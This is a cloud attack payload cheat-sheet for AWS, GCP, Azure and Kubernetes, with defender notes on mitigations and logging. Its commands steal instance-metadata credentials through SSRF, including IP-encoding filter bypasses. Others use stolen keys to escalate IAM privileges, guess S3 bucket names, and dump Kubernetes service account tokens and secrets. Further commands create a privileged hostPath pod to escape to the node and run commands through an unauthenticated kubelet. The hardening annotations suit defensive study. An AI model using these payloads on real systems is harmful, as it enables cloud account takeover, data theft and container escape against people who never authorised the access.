Cloud attack payloads for AWS, GCP, Azure, and Kubernetes. SSRF-to-metadata exploitation, IAM credential theft, S3/Cloud Storage misconfigs, container escape, and Kubernetes service account abuse. (33 payloads)
# ---------------------------------------------------------------------------
# Cloud metadata / credential cheat-sheet (AWS, GCP, Azure, Kubernetes).
# Each section is annotated with the control that neutralises it and the
# telemetry it leaves behind, so the list reads as a hardening checklist too.
# Values in <angle brackets> are placeholders supplied at run time.
# ---------------------------------------------------------------------------
# AWS IMDSv1: plain unauthenticated GETs against the link-local address, so any
# SSRF that can reach 169.254.169.254 reads the same role credentials.
# Defender note: require IMDSv2 (modify-instance-metadata-options --http-tokens
# required) and keep --http-put-response-hop-limit at 1; every token-less
# request in this block then gets HTTP 401. CloudTrail does not record IMDS
# reads, so detection rests on where the credentials are used afterwards (see
# the AWS CLI section below). Treat user-data as public to the instance: keep
# bootstrap secrets in Secrets Manager / SSM Parameter Store, not there.
curl http://169.254.169.254/latest/meta-data/curl http://169.254.169.254/latest/meta-data/iam/security-credentials/curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<ROLE_NAME>curl http://169.254.169.254/latest/meta-data/hostname
curl http://169.254.169.254/latest/meta-data/public-hostname
curl http://169.254.169.254/latest/meta-data/public-ipv4
curl http://169.254.169.254/latest/meta-data/local-ipv4curl http://169.254.169.254/latest/user-datacurl http://169.254.169.254/latest/meta-data/instance-id
curl http://169.254.169.254/latest/meta-data/placement/region
curl http://169.254.169.254/latest/meta-data/placement/availability-zonecurl http://169.254.169.254/latest/meta-data/iam/info# Alternative IP encodings for SSRF WAF bypass:
# Defender note: SSRF filters that string-match the literal address miss these
# forms. Resolve the destination, canonicalise the IP and deny the link-local
# range at the egress/proxy layer instead; with IMDSv2 required, a GET-only
# SSRF cannot obtain a token regardless of how the address is spelled.
curl http://2130706433/latest/meta-data/ # 169.254.169.254 decimal
curl http://0xa9fea9fe/latest/meta-data/ # hex
curl http://0251.0376.0251.0376/latest/meta-data/ # octal
curl http://169.254.169.254.nip.io/latest/meta-data/ # DNS redirect# Step 1: Get IMDSv2 session token (PUT request required)
# Defender note: the PUT is the control point — it needs a method the attacker
# chooses and a response that survives the hop limit. 21600 s is the maximum
# token TTL; a long-lived token on a box is worth rotating out via a stop/start
# of the instance metadata options during incident response.
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" \
-H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
# Step 2: Use token for all requests
curl -H "X-aws-ec2-metadata-token: $TOKEN" \
http://169.254.169.254/latest/meta-data/TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" \
-H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
http://169.254.169.254/latest/meta-data/iam/security-credentials/# IMDSv2 via SSRF — PUT with hop limit bypass:
# IMDSv2 PUT requires TTL > 1 (packet hop) from the instance itself
# If SSRF goes through a proxy that adds a hop, token request fails
# Bypass: if app follows redirects or allows custom headers:
# Defender note: IMDS rejects any token PUT that carries an X-Forwarded-For
# header, and with hop limit 1 the PUT response is dropped at the first
# NAT/container hop; neither the header nor a redirect-following client
# changes that. Keep the hop limit at 1 unless a containerised workload on the
# instance genuinely needs 2, and never higher.
curl -s -X PUT "http://169.254.169.254/latest/api/token" \
-H "X-aws-ec2-metadata-token-ttl-seconds: 21600" \
-H "X-Forwarded-For: 127.0.0.1" \
--max-redirs 3# Use stolen credentials with AWS CLI:
# Defender note: role credentials used off-instance reach CloudTrail with a
# source IP and user agent that do not belong to the instance; GuardDuty's
# instance-credential-exfiltration findings key on exactly this. The
# aws:EC2InstanceSourceVPC / aws:EC2InstanceSourcePrivateIPv4 condition keys
# can deny instance-role credentials presented from outside their VPC.
# Exported secrets are visible to every child process and to `set -x` traces.
export AWS_ACCESS_KEY_ID=<AccessKeyId>
export AWS_SECRET_ACCESS_KEY=<SecretAccessKey>
export AWS_SESSION_TOKEN=<Token>
export AWS_DEFAULT_REGION=<region>
# Verify identity:
aws sts get-caller-identity
# List accessible S3 buckets:
aws s3 ls
# List EC2 instances:
aws ec2 describe-instances# S3 bucket access check:
# Defender note: account-level S3 Block Public Access turns the unauthenticated
# requests below into 403s. Enable S3 data events in CloudTrail (or server
# access logging) so anonymous ListBucket attempts are visible; they arrive
# with no signed principal, which is itself the signal.
curl -s https://<bucket_name>.s3.amazonaws.com/
aws s3 ls s3://<bucket_name> --no-sign-request
aws s3 ls s3://<bucket_name> # authenticated# Common S3 bucket naming patterns to try:
# Defender note: name guessing is noisy — each probe is a logged request, and
# bucket names are global, so a pre-registered name with Block Public Access
# on denies the guess outright. Monitoring for AccessDenied bursts across your
# own buckets catches this enumeration early.
<company_name>-backup
<company_name>-data
<company_name>-prod
<company_name>-dev
<company_name>-staging
<company_name>-logs
<company_name>-assets
<company_name>-config
<company_name>-secrets# IAM enumeration with stolen credentials:
# Defender note: every call here is a CloudTrail management event. A burst of
# get-account-summary / list-*-policies from a role that normally talks to one
# service is a reconnaissance signature worth an alert on its own.
aws iam get-user
aws iam list-attached-user-policies --user-name <user>
aws iam list-user-policies --user-name <user>
aws iam get-account-summary
aws sts get-caller-identity# IAM privilege escalation paths:
# Defender note: CreatePolicyVersion with --set-as-default and AttachUserPolicy
# of AdministratorAccess are low-volume, high-signal events — alert on them
# unconditionally. Permission boundaries and SCPs cap what a compromised
# principal can grant itself; iam:PassRole must be scoped to specific role
# ARNs rather than "*", or the RunInstances path is open to any role.
# If iam:CreatePolicyVersion:
aws iam create-policy-version --policy-arn <arn> --policy-document file://admin.json --set-as-default
# If iam:AttachUserPolicy:
aws iam attach-user-policy --user-name <user> --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
# If iam:PassRole + ec2:RunInstances → create instance with privileged role# CloudTrail / logs check:
# Defender note: StopLogging / DeleteTrail / UpdateTrail are themselves logged
# and GuardDuty raises a CloudTrail-logging-disabled finding on them. An
# organization trail owned by the management account cannot be altered from a
# member account, which removes this option for the attacker entirely.
aws cloudtrail describe-trails
aws cloudtrail get-trail-status --name <trail_name>
# If disabled → less forensic risk during operation# GCP IMDS requires Metadata-Flavor: Google header
# Defender note: the mandatory header means a GET-only SSRF without header
# control cannot read this endpoint; exposure comes from header-controlling
# SSRF or code execution on the VM. Keep disable-legacy-endpoints=true (the
# default), attach a dedicated least-privilege service account instead of the
# Compute default one, and watch Cloud Audit Logs for that service account
# acting outside its usual projects or from unexpected source IPs.
curl -s "http://metadata.google.internal/computeMetadata/v1/" \
-H "Metadata-Flavor: Google"curl -s "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" \
-H "Metadata-Flavor: Google"curl -s "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email" \
-H "Metadata-Flavor: Google"
curl -s "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes" \
-H "Metadata-Flavor: Google"curl -s "http://metadata.google.internal/computeMetadata/v1/project/project-id" \
-H "Metadata-Flavor: Google"
curl -s "http://metadata.google.internal/computeMetadata/v1/project/numeric-project-id" \
-H "Metadata-Flavor: Google"curl -s "http://metadata.google.internal/computeMetadata/v1/instance/attributes/" \
-H "Metadata-Flavor: Google"
# Then retrieve each attribute:
# Defender note: on GKE, Workload Identity (formerly metadata concealment)
# blocks pods from reaching kube-env and the node service-account token, and
# Shielded GKE Nodes are designed so leaked bootstrap material cannot be used
# to register a rogue node. Both are the fix for the attribute reads below.
curl -s "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env" \
-H "Metadata-Flavor: Google"
# kube-env on GKE nodes contains KUBELET_CERT, CA_CERT, and bootstrap tokens# Alternative GCP metadata IPs for SSRF bypass:
# Defender note: the header requirement applies on every alias. Filter on the
# link-local range and on metadata.google.internal at the egress proxy rather
# than on the literal hostname the application happens to use.
curl "http://metadata.google.internal/computeMetadata/v1/..." \
-H "Metadata-Flavor: Google"
curl "http://169.254.169.254/computeMetadata/v1/..." \
-H "Metadata-Flavor: Google"
curl "http://0x69fea9fe/computeMetadata/v1/" \
-H "Metadata-Flavor: Google"# Azure IMDS requires Metadata: true header
# Defender note: Azure IMDS is non-routable (VM-local) and needs the
# Metadata: true header, so the risk is header-controlling SSRF or code
# execution on the VM. A managed-identity token is only as dangerous as the
# identity's role assignments — keep those minimal and resource-scoped — and
# its use appears in Entra ID sign-in logs (managed identity sign-ins) and in
# the Activity Log of every subscription it touches.
curl -s -H "Metadata: true" \
"http://169.254.169.254/metadata/instance?api-version=2021-02-01"curl -s -H "Metadata: true" \
"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"curl -s -H "Metadata: true" \
"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://storage.azure.com/"curl -s -H "Metadata: true" \
"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://vault.azure.net/"# Use Azure access token with REST API:
# Defender note: the subscriptions listing below is a plain ARM read; a
# managed identity that normally writes to one resource group suddenly
# enumerating subscriptions is the anomaly to alert on.
TOKEN=$(curl -s -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" | python3 -c "import sys,json;print(json.load(sys.stdin)['access_token'])")
# List subscriptions:
curl -s -H "Authorization: Bearer $TOKEN" \
"https://management.azure.com/subscriptions?api-version=2020-01-01"# Service account token location:
# Defender note: set automountServiceAccountToken: false on every pod that
# does not talk to the API, and bind service accounts only to the RBAC they
# use. Bound (projected, time-limited) tokens — the default since 1.22 — cap
# how long a token read from this path stays valid.
cat /var/run/secrets/kubernetes.io/serviceaccount/token
cat /var/run/secrets/kubernetes.io/serviceaccount/namespace
cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt# Call K8s API server with service account token:
# Defender note: with API server audit logging enabled, each request below is
# attributed to the service account; a workload SA listing namespaces or
# secrets it has never touched is the alert. `kubectl auth can-i --list
# --as=system:serviceaccount:<ns>:<sa>` shows what a leaked token can reach.
APISOURCE=https://kubernetes.default.svc
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
curl -sSk -H "Authorization: Bearer $TOKEN" $APISOURCE/api/v1/namespaces
curl -sSk -H "Authorization: Bearer $TOKEN" $APISOURCE/api/v1/namespaces/default/secrets
curl -sSk -H "Authorization: Bearer $TOKEN" $APISOURCE/api/v1/namespaces/default/pods# Get all secrets in cluster (if permission allows):
# Defender note: a cluster-wide secrets list requires a ClusterRole; audit
# which subjects hold `secrets` list/get at cluster scope and alert on the
# request path /api/v1/secrets from any workload identity.
curl -sSk -H "Authorization: Bearer $TOKEN" \
https://kubernetes.default.svc/api/v1/secrets | python3 -m json.tool# Create privileged pod for node escape:
# Defender note: Pod Security Admission at the baseline level (and therefore
# restricted) rejects privileged:true and hostPath volumes at admission —
# enforce it cluster-wide, not just in a few namespaces. The create request
# itself lands in the audit log with the service account as actor; alert on
# pod creates requesting either setting.
curl -sSk -H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-X POST https://kubernetes.default.svc/api/v1/namespaces/default/pods \
-d '{"apiVersion":"v1","kind":"Pod","metadata":{"name":"escape"},"spec":{"containers":[{"name":"escape","image":"ubuntu","command":["/bin/bash","-c","chroot /host bash"],"volumeMounts":[{"mountPath":"/host","name":"host"}],"securityContext":{"privileged":true}}],"volumes":[{"name":"host","hostPath":{"path":"/"}}]}}'
# Pod creates with host filesystem mounted — chroot to escape# Kubelet API (often unauthenticated on port 10250):
# Defender note: run the kubelet with --anonymous-auth=false and
# --authorization-mode=Webhook so 10250 requires a valid, authorized identity
# (most managed offerings do this by default), and keep 10250 reachable only
# from the control plane at the node firewall / security-group layer.
curl -sk https://<NODE_IP>:10250/pods
curl -sk https://<NODE_IP>:10250/run/<namespace>/<pod>/<container> \
-d "cmd=id"
# Execute commands in any pod on that node without auth